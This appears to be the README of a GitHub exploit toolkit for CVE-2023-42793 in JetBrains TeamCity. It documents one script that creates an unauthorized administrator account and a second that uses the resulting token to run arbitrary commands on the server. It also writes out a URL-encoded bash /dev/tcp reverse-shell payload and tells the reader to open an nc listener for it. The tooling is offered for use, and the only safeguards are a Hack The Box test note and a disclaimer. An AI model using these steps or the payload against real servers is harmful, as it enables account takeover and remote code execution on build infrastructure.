# CVE-2023-42793 - TeamCity Admin Account Creation lead to RCE
>  use `` first to creat administrator account for you and then use `` to execute commands on the target, and for reverse shell check [this](  

# exploit script

## Description
This script exploits CVE-2023-42793 to create an admin account on a TeamCity server. It sends a POST request to the target URL to create an admin user with specified or random credentials.

## Usage
python -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]

### Options
- `-u, --url URL`: Target URL (required)
- `-v, --verbose`: Enable verbose mode
- `-n, --username USERNAME`: Specify username (default: random)
- `-p, --password PASSWORD`: Specify password (default: random)
- `-e, --email EMAIL`: Specify email (default: random)
- `-t, --token-file`: File to save the token
## Prerequisites
- Python 3.x
- Python libraries
    + To install the dependencies `pip3 install -r requirements.txt`

## Examples
1. Exploit with random username, password, and email:
   python -u

2. Exploit with specified username, password, and email:
    python -u -n admin -p admin123 -e

## Output
Upon successful exploitation, the script prints the URL, username, and password of the created admin account then save the output in token file.

# Remote Code Execution (RCE) Script
This script allows executing commands on a vulnerable TeamCity server exploiting CVE-2023-42793. It first enables the debug processes and then executes the specified command using the appropriate API endpoints.

## Usage
python -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]
## Options
- `-u, --url URL` : Target URL (required)
- `-t, --token-file` : TO specify the file containing the token
- `-c, --command COMMAND`: Specify command to execute (RCE)
- `-P, --port PORT`: Specify port (default is 80)

## Example
Exploit with a specified command:
python -u -t token -c "whoami"
## For reverse shell
python3 -u -t token -c '"/bin/bash"&params="-c"&params="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
+ In this command for reverse shell replace {IP} with your ip and {port} with the port you are listening on
+ Creat a listener using nc for ex `nc -nvlp 5555`
+ For more check [revshells](

## Notes
- This script has been tested on [Runner.htb]( from hack the box
- This script is for educational purposes only.
- Use it responsibly and only on systems you are authorized to test.

## Credits
- Zyad Elsayed
  + GitHub Repository: [Zyad-Elsayed](
  + LinkedIn account: [zyad-abdelbary](
- Original Exploit for admin account: ByteHunter ([Exploit-DB](

## Resources

- [CVE-2023-42793 Description]( Official description of the CVE vulnerability.
- [Exploit Database Entry]( Original exploit code on Exploit Database.
- [TeamCity Blog]( Blog post discussing the CVE-2023-42793 vulnerability in TeamCity.
- [TeamCity Documentation]( Official documentation for TeamCity.